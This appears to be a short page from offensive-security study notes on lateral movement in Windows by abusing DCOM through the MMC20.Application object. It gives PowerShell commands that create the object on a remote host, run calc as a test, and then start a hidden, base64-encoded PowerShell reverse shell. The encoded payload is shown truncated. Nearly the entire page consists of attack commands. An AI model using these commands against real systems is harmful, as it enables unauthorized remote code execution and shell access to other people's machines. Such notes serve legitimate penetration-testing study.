DCOM

We must be local administrator on the host and target for this attack.

This leverages DCOM with the Microsoft Mangement Console MMC.

DCOM is an API for programs intercommunication over the network.

In a powershell cli first create the MMC instance:

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))

Then we can start the calculator:

$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")

Or spawn a reverse shell:

$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5A...
AC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA","7")

PreviousPass-the-Ticket Next5 - Persistence

Last updated 2 years ago